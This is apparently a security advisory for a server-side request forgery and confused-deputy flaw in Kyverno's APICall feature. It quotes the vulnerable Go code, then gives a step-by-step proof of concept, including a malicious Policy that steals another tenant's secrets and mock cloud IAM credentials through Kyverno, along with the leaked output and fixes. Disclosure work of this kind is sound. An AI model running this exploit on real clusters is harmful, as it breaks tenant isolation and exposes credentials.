+ "details": "### Summary\n\nKyverno's APICall feature contains a Server-Side Request Forgery (SSRF) vulnerability that allows users with Policy creation permissions to access arbitrary internal resources through Kyverno's high-privilege ServiceAccount. In multi-tenant Kubernetes environments, this constitutes a classic Confused Deputy problem: low-privilege tenants can steal sensitive data from other tenants (such as database passwords and API keys) and cloud platform IAM credentials, completely breaking tenant isolation. This vulnerability does not require cluster-admin privileges and can be exploited with only namespace-level Policy creation permissions.\n\n### Details\n\n#### Vulnerability Mechanism\n\nKyverno's APICall feature allows Policies to fetch external data via HTTP requests. This feature does not validate target URLs when executing HTTP requests, leading to an SSRF vulnerability.\n\n**Source Point - User-Controlled URL**\n\nFile: `api/kyverno/v1/common_types.go`, lines 247-250\n\n```go\ntype ServiceCall struct {\n // URL is the JSON web service URL\n URL string `json:\"url\"` // User-controlled, no validation\n Headers []HTTPHeader `json:\"headers,omitempty\"`\n CABundle string `json:\"caBundle,omitempty\"`\n}\n```\n\nThe URL field is completely controlled by users through Policy configuration, with no validation mechanism to restrict target addresses.\n\n**Sink Point - HTTP Request Execution**\n\nFile: `pkg/engine/apicall/executor.go`, lines 65-110\n\n```go\nfunc (a *executor) executeServiceCall(ctx context.Context, apiCall *kyvernov1.APICall) ([]byte, error) {\n if apiCall.Service == nil {\n return nil, fmt.Errorf(\"missing service for APICall %s\", [a.name](http://a.name/))\n }\n\n client, err := a.buildHTTPClient(apiCall.Service)\n if err != nil {\n return nil, err\n }\n\n req, err := a.buildHTTPRequest(ctx, apiCall)\n if err != nil {\n return nil, fmt.Errorf(\"failed to build HTTP request for APICall %s: %w\", [a.name](http://a.name/), err)\n }\n\n // Line 80: Directly executes HTTP request without URL validation\n resp, err := client.Do(req)\n if err != nil {\n return nil, fmt.Errorf(\"failed to execute HTTP request for APICall %s: %w\", [a.name](http://a.name/), err)\n }\n defer resp.Body.Close()\n\n // Read and return response content\n body, err := io.ReadAll(resp.Body)\n if err != nil {\n // ...\n }\n\n return body, nil\n}\n```\n\nLine 80's `client.Do(req)` directly executes the HTTP request without checking if the target URL is an internal IP address (like 169.254.169.254) or resources belonging to other tenants.\n\n**Confused Deputy Problem**\n\nIn multi-tenant environments, Kyverno uses a cluster-wide high-privilege ServiceAccount to execute all APICall requests. When a low-privilege tenant creates a Policy containing malicious APICall directives, Kyverno executes these requests with its own high privileges, leading to privilege escalation.\n\nAttack path:\n```\nTenant A (namespace-level permissions)\n → Creates malicious Policy\n → Kyverno (cluster-wide high privileges)\n → Accesses Tenant B's Secrets / Cloud metadata service\n → Sensitive data leaked to PolicyReport\n → Tenant A reads PolicyReport to obtain data\n```\n\n### PoC\n\n#### Environment Setup\n\n**Prerequisites**\n- Kubernetes cluster \n- Kyverno v1.16.0 installed\n- Mock cloud metadata service (optional, for testing cloud credential theft)\n\n**Step 1: Install Kyverno**\n\n```bash\nkubectl create namespace kyverno\nkubectl create -f https://github.com/kyverno/kyverno/releases/download/v1.16.0/install.yaml\nkubectl wait --for=condition=Ready pods --all -n kyverno --timeout=300s\n```\n\nVerify installation:\n```bash\n$ kubectl get pods -n kyverno\nNAME READY STATUS RESTARTS AGE\nkyverno-admission-controller-5c84845f5-28hz5 1/1 Running 0 2m\nkyverno-background-controller-59b7b8d686-7pqxl 1/1 Running 0 2m\nkyverno-cleanup-controller-5fd988d64f-nsgdb 1/1 Running 0 2m\nkyverno-reports-controller-546cb78fbc-2dd74 1/1 Running 0 2m\n```\n\n**Step 2: Deploy Mock Metadata Service**\n\nCreate file `metadata-mock.yaml`:\n\n```yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n name: metadata-mock\n---\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: metadata-mock\n namespace: metadata-mock\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: metadata-mock\n template:\n metadata:\n labels:\n app: metadata-mock\n spec:\n containers:\n - name: mock-server\n image: python:3.9-slim\n command: [\"python\", \"-c\"]\n args:\n - |\n import http.server\n import socketserver\n import json\n\n class Handler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if 'iam/security-credentials/test-role' in self.path:\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n creds = {\n \"AccessKeyId\": \"AKIAIOSFODNN7EXAMPLE\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n \"Token\": \"SimulatedSessionToken123456\",\n \"Expiration\": \"2025-12-31T23:59:59Z\"\n }\n self.wfile.write(json.dumps(creds).encode())\n else:\n self.send_response(404)\n self.end_headers()\n\n with socketserver.TCPServer((\"\", 80), Handler) as httpd:\n httpd.serve_forever()\n ports:\n - containerPort: 80\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: metadata-mock\n namespace: metadata-mock\nspec:\n selector:\n app: metadata-mock\n ports:\n - port: 80\n targetPort: 80\n```\n\nDeploy:\n```bash\nkubectl apply -f metadata-mock.yaml\nkubectl wait --for=condition=Ready pods --all -n metadata-mock --timeout=120s\n```\n\n**Step 3: Create Multi-Tenant Environment**\n\nCreate two tenant namespaces:\n```bash\nkubectl create namespace tenant-a\nkubectl create namespace tenant-b\n```\n\nCreate sensitive data in tenant-b:\n```bash\nkubectl create secret generic db-credentials -n tenant-b \\\n --from-literal=username=admin \\\n --from-literal=password=SuperSecret123! \\\n --from-literal=database=production-db\n```\n\nCreate restricted ServiceAccount for tenant-a:\n```bash\nkubectl create serviceaccount tenant-a-admin -n tenant-a\n```\n\nCreate file `tenant-a-rbac.yaml`:\n```yaml\napiVersion: [rbac.authorization.k8s.io/v1](http://rbac.authorization.k8s.io/v1)\nkind: Role\nmetadata:\n name: policy-creator\n namespace: tenant-a\nrules:\n- apiGroups: [\"[kyverno.io](http://kyverno.io/)\"]\n resources: [\"policies\"]\n verbs: [\"create\", \"get\", \"list\", \"update\", \"patch\", \"delete\"]\n- apiGroups: [\"\"]\n resources: [\"configmaps\"]\n verbs: [\"create\", \"get\", \"list\"]\n- apiGroups: [\"[wgpolicyk8s.io](http://wgpolicyk8s.io/)\"]\n resources: [\"policyreports\"]\n verbs: [\"get\", \"list\"]\n---\napiVersion: [rbac.authorization.k8s.io/v1](http://rbac.authorization.k8s.io/v1)\nkind: RoleBinding\nmetadata:\n name: tenant-a-policy-creator\n namespace: tenant-a\nroleRef:\n apiGroup: [rbac.authorization.k8s.io](http://rbac.authorization.k8s.io/)\n kind: Role\n name: policy-creator\nsubjects:\n- kind: ServiceAccount\n name: tenant-a-admin\n namespace: tenant-a\n```\n\nApply configuration:\n```bash\nkubectl apply -f tenant-a-rbac.yaml\n```\n\n**Step 4: Verify Permission Isolation**\n\nCreate test Pod:\n```bash\nkubectl run tenant-a-test -n tenant-a \\\n --image=bitnami/kubectl:latest \\\n --serviceaccount=tenant-a-admin \\\n --command -- sleep 3600\n```\n\nVerify tenant-a cannot directly access tenant-b:\n```bash\n$ kubectl exec -n tenant-a tenant-a-test -- kubectl get secrets -n tenant-b\nError from server (Forbidden): secrets is forbidden: User \"system:serviceaccount:tenant-a:tenant-a-admin\" cannot list resource \"secrets\" in API group \"\" in the namespace \"tenant-b\"\n```\n\nThis confirms that tenant-a's ServiceAccount indeed cannot directly access tenant-b's resources.\n\n#### Exploitation\n\n**Step 1: Create Malicious Policy**\n\nCreate file `confused-deputy-attack.yaml`:\n\n```yaml\napiVersion: [kyverno.io/v1](http://kyverno.io/v1)\nkind: Policy\nmetadata:\n name: confused-deputy-attack\n namespace: tenant-a\nspec:\n background: true\n validationFailureAction: Audit\n rules:\n - name: steal-tenant-b-secrets\n match:\n any:\n - resources:\n kinds:\n - ConfigMap\n context:\n - name: tenantBSecrets\n apiCall:\n method: GET\n urlPath: \"/api/v1/namespaces/tenant-b/secrets/db-credentials\"\n validate:\n message: \"STOLEN TENANT-B SECRETS - Username: {{ tenantBSecrets.data.username | base64_decode(@) }}, Password: {{ tenantBSecrets.data.password | base64_decode(@) }}, Database: {{ tenantBSecrets.data.database | base64_decode(@) }}\"\n pattern:\n metadata:\n labels:\n force-fail: \"true\"\n - name: steal-cloud-credentials\n match:\n any:\n - resources:\n kinds:\n - ConfigMap\n context:\n - name: cloudCreds\n apiCall:\n method: GET\n service:\n url: \"http://metadata-mock.metadata-mock.svc.cluster.local/latest/meta-data/iam/security-credentials/test-role\"\n validate:\n message: \"STOLEN CLOUD CREDENTIALS - AccessKeyId: {{ cloudCreds.AccessKeyId }}, SecretAccessKey: {{ cloudCreds.SecretAccessKey }}\"\n pattern:\n metadata:\n labels:\n force-fail-cloud: \"true\"\n```\n\nApply Policy:\n```bash\n$ kubectl apply -f confused-deputy-attack.yaml\n[policy.kyverno.io/confused-deputy-attack](http://policy.kyverno.io/confused-deputy-attack) created\n```\n\n**Step 2: Trigger Policy Execution**\n\nCreate ConfigMap to trigger Policy:\n```bash\n$ kubectl create configmap attack-trigger -n tenant-a --from-literal=trigger=now\nconfigmap/attack-trigger created\n```\n\n**Step 3: View Stolen Data**\n\nAfter a few seconds, check PolicyReport:\n```bash\n$ kubectl get policyreport -n tenant-a -o yaml | grep -A 5 \"STOLEN\"\n```\n\nActual output:\n```yaml\n- message: 'validation error: STOLEN TENANT-B SECRETS - Username: admin, Password:\n SuperSecret123!, Database: production-db. rule steal-tenant-b-secrets failed\n at path /metadata/labels/'\n policy: tenant-a/confused-deputy-attack\n result: fail\n rule: steal-tenant-b-secrets\n--\n- message: 'validation error: STOLEN CLOUD CREDENTIALS - AccessKeyId: AKIAIOSFODNN7EXAMPLE,\n SecretAccessKey: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY. rule steal-cloud-credentials\n failed at path /metadata/labels/'\n policy: tenant-a/confused-deputy-attack\n result: fail\n rule: steal-cloud-credentials\n```\n\nAttack successful. Tenant-a has stolen through Kyverno:\n1. Tenant-b's database credentials (username: admin, password: SuperSecret123!, database: production-db)\n2. Cloud platform IAM credentials (AccessKeyId and SecretAccessKey)\n\n**Step 4: Verify Kyverno Logs**\n\nCheck Kyverno admission controller logs:\n```bash\n$ kubectl logs -n kyverno deployment/kyverno-admission-controller --tail=100 | grep -i \"apicall\"\n2026-01-06T14:40:34Z INFO DefaultContextLoaderFactory apicall/apiCall.go:151 executed service APICall {\"name\": \"cloudCredentials\", \"len\": 180}\n```\n\nLogs show APICall executed successfully, returning 180 bytes of data (exactly the JSON length of the mock credentials).\n\n### Impact\n\nThis is a critical security vulnerability with particularly severe impact in multi-tenant Kubernetes environments.\n\n**Affected Environments**\n- All multi-tenant Kubernetes clusters using Kyverno\n- Environments granting users namespace-level Policy creation permissions\n- Clusters running on cloud platforms (AWS EKS, GCP GKE, Azure AKS)\n\n**Vulnerability Impact**\n\n1. Complete Multi-Tenant Isolation Breach\n - Tenants can read other tenants' Secrets (database passwords, API keys, etc.)\n - Tenants can access other tenants' ConfigMaps and other resources\n - Completely violates security assumptions of multi-tenant environments\n\n2. Cloud Platform Credential Leakage\n - Can access cloud metadata service (169.254.169.254)\n - Obtain node IAM role credentials\n - Use these credentials to access cloud platform resources (S3, RDS, GCS, etc.)\n\n3. Lateral Movement\n - Extend from Kubernetes cluster permissions to cloud platform resource access\n - Potentially access other tenants' cloud resources\n - Further penetration in cloud environments\n\n4. Confused Deputy Problem\n - Low-privilege users leverage high-privilege proxy (Kyverno) to execute privileged operations\n - Bypass RBAC permission controls\n - Difficult to trace actual attackers through audit logs\n\n**Severity Assessment**\n\n- CVSS 3.1 Score: 8.5 (Critical)\n- CWE Classification: CWE-918 (Server-Side Request Forgery)\n\n\nIn multi-tenant environments, the severity of this vulnerability is much higher than in single-tenant environments because it does not require cluster-admin privileges and can be exploited with only namespace-level Policy creation permissions.\n\n**Real-World Scenario Risks**\n\nScenario 1: SaaS Multi-Tenant Platform\n- Each customer has one namespace\n- Customer A can steal Customer B's database passwords and API keys\n- Leads to data breaches, compliance violations, loss of customer trust\n\nScenario 2: Enterprise Internal Multi-Team Shared Cluster\n- Different business teams share one Kubernetes cluster\n- Team A can steal Team B's production database credentials\n- Leads to internal data breaches, production incidents\n\nScenario 3: Cloud Platform Managed Kubernetes\n- Running on AWS EKS, GCP GKE, Azure AKS\n- Tenants can obtain node IAM role credentials\n- Access cloud platform resources, lateral movement to cloud environment\n\n**Remediation Recommendations**\n\nImmediate measures:\n1. Disable APICall feature in multi-tenant environments\n2. Restrict Policy creation permissions to cluster-admin only\n3. Use NetworkPolicy to restrict Kyverno Pod egress traffic\n\nLong-term fixes:\n1. Add URL validation in executeServiceCall function to block internal IP addresses\n2. Use separate low-privilege ServiceAccount for APICall\n3. Implement URL whitelist mechanism\n4. Audit and monitor all APICall requests",
0 commit comments